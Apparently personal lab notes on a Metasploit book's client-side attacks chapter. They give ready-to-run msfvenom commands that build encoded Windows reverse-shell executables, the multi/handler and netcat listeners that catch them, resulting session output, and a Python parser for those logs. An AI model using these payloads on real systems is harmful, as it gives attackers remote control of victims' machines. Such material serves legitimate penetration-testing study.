Msfvenom_clientsideattacks Metasploit_Revelated_Sagar_Rahalkar

Incomplete msfvenom notes from the book Metasploit Revealed (client-side attacks chapter) by Sagar Rahalkar

root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
....
msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp  \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o  \
/root/payload_msfvenom_192_168_56_102_8080.exe

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/payload_msfvenom.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload_msfvenom.exe
root@kali:~# 

where:

  • -a x86 is the processor architecture
  • --platform windows the target platform
  • -p windows/meterpreter/reverse_tcp the type of payload to create
  • LHOST=192.168.56.102 the IP address it will connect back to (payload-specific parameters)
  • LPORT=8080 the port it will connect back to
  • -e x86/shikata_ga_nai the encoder to use
  • -f exe the file type to create
  • -o /root/payload_msfvenom.exe the output file

On the other side we have to start the listening socket/process, waiting for the payload_msfvenom.exe we created to be executed.

root@kali:~# msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.56.102; set lport 8080; run;exit -y"

       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

payload => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.102
lport => 8080
[*] Started reverse TCP handler on 192.168.56.102:8080 

The moment payload_msfvenom.exe is launched on the client, the connection shows up on the server that was listening.

[*] Sending stage (179779 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.1:48116) at 2019-07-23 05:26:40 -0400

meterpreter > sysinfo
Computer        : W7B-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Another way: launch the “multi/handler” manually from msfconsole

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set lport 8080
run
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > info

       Name: Generic Payload Handler
...

Description:
  This module is a stub that provides all of the features of the 
  Metasploit payload system to exploits that have been launched 
  outside of the framework.

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.102
msf5 exploit(multi/handler) > set lport 8080
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.102:8080
[*] Sending stage (179779 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.104:49157) at 2019-07-25 16:50:22 -0400

meterpreter > 
meterpreter > sysinfo
Computer        : W7MINPC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
Create an unstaged (non-staged) reverse shell.

https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90

msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp  \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o  \
/root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe

root@kali:~# msfvenom -a x86 --platform windows \
> -p windows/shell_reverse_tcp  \
> LHOST=192.168.56.102 LPORT=8080 \
> -e x86/shikata_ga_nai -f exe -o  \
> /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
root@kali:~# 

Now I set up a “listener” waiting for the payload to run

nc -nvlp 8080

and when the payload is launched I already have a command interpreter.

root@kali:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 1041
'\\VBOXSVR\tmpW7\pentesting'
CMD.EXE se inició con esta ruta como el directorio actual. No se permiten
rutas UNC. Regresando de manera predeterminada al directorio Windows.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>
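The three transcripts above (msfvenom output, the multi/handler session line, and the netcat callback) are what ends up in an engagement log, and the difference between the staged and the unstaged case is visible in them: only the staged payload produces a "Sending stage" line, and the exe size barely changes between the two because it is almost all PE template. The following parser is an added example written for these notes (it is not code from the book or from Metasploit) that turns those lines into structured records; the regular expressions assume exactly the line formats shown above, and the embedded samples are constructed copies of them, not captured traffic.

```python
import re

# Constructed samples in the shape of the console output shown in these notes.
MSFVENOM_OUTPUT = """\
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload_msfvenom.exe
"""

HANDLER_OUTPUT = """\
[*] Started reverse TCP handler on 192.168.56.102:8080
[*] Sending stage (179779 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.104:49157) at 2019-07-25 16:50:22 -0400
"""

NETCAT_OUTPUT = """\
listening on [any] 8080 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 1041
"""

# msfvenom summary lines (assumed format, as printed above)
_ENCODER_RE = re.compile(r"^(?P<enc>\S+) chosen with final size (?P<size>\d+)$")
_PAYLOAD_RE = re.compile(r"^Payload size: (?P<size>\d+) bytes$")
_FINAL_RE = re.compile(r"^Final size of (?P<fmt>\w+) file: (?P<size>\d+) bytes$")
_SAVED_RE = re.compile(r"^Saved as: (?P<path>.+)$")

# multi/handler and netcat lines (assumed format, as printed above)
_LISTEN_RE = re.compile(r"Started reverse TCP handler on (?P<ip>[\d.]+):(?P<port>\d+)")
_STAGE_RE = re.compile(r"Sending stage \((?P<size>\d+) bytes\) to (?P<ip>[\d.]+)")
_SESSION_RE = re.compile(
    r"(?P<kind>\w+) session (?P<id>\d+) opened "
    r"\((?P<lip>[\d.]+):(?P<lport>\d+) -> (?P<rip>[\d.]+):(?P<rport>\d+)\) at (?P<ts>.+)$"
)
_NC_LISTEN_RE = re.compile(r"listening on \[any\] (?P<port>\d+)")
_NC_CONNECT_RE = re.compile(r"connect to \[(?P<lip>[\d.]+)\] from \(\S+\) \[(?P<rip>[\d.]+)\] (?P<rport>\d+)")


def parse_msfvenom(text):
    """Extract encoder, payload size, output format/size and path from msfvenom's summary.

    template_bytes is the part of the file that is not the payload: the exe wrapper.
    """
    info = {"encoder": None, "payload_bytes": None, "format": None, "file_bytes": None, "path": None}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _ENCODER_RE.match(line):
            info["encoder"] = m["enc"]
        elif m := _PAYLOAD_RE.match(line):
            info["payload_bytes"] = int(m["size"])
        elif m := _FINAL_RE.match(line):
            info["format"] = m["fmt"]
            info["file_bytes"] = int(m["size"])
        elif m := _SAVED_RE.match(line):
            info["path"] = m["path"]
    if info["payload_bytes"] is not None and info["file_bytes"] is not None:
        info["template_bytes"] = info["file_bytes"] - info["payload_bytes"]
    return info


def parse_callback(text):
    """Describe one callback from multi/handler or netcat output.

    staged is True only when a "Sending stage" line is present, which is how the
    windows/meterpreter/reverse_tcp session differs from the windows/shell_reverse_tcp one.
    """
    cb = {"listener": None, "remote": None, "staged": False, "stage_bytes": None,
          "session": None, "kind": None, "opened_at": None}
    for line in text.splitlines():
        if m := _LISTEN_RE.search(line):
            cb["listener"] = (m["ip"], int(m["port"]))
        elif m := _STAGE_RE.search(line):
            cb["staged"] = True
            cb["stage_bytes"] = int(m["size"])
        elif m := _SESSION_RE.search(line):
            cb["kind"] = m["kind"]
            cb["session"] = int(m["id"])
            cb["listener"] = (m["lip"], int(m["lport"]))
            cb["remote"] = (m["rip"], int(m["rport"]))
            cb["opened_at"] = m["ts"]
        elif m := _NC_LISTEN_RE.search(line):
            # netcat only reports the port; the local address comes with the connect line
            cb["listener"] = ("0.0.0.0", int(m["port"]))
        elif m := _NC_CONNECT_RE.search(line):
            port = cb["listener"][1] if cb["listener"] else None
            cb["listener"] = (m["lip"], port)
            cb["remote"] = (m["rip"], int(m["rport"]))
            cb["kind"] = "shell"
    return cb


if __name__ == "__main__":
    print(parse_msfvenom(MSFVENOM_OUTPUT))
    print(parse_callback(HANDLER_OUTPUT))
    print(parse_callback(NETCAT_OUTPUT))
```

Running it on the two transcripts from these notes gives template_bytes of 73434 for the 368-byte payload (and 73451 for the 351-byte one), which is why the "Final size of exe file" is the same 73802 bytes in both runs: the payload is under half a percent of the file. The handler record carries a 179779-byte stage and session id, while the netcat record has no stage at all, matching the staged versus unstaged distinction made above.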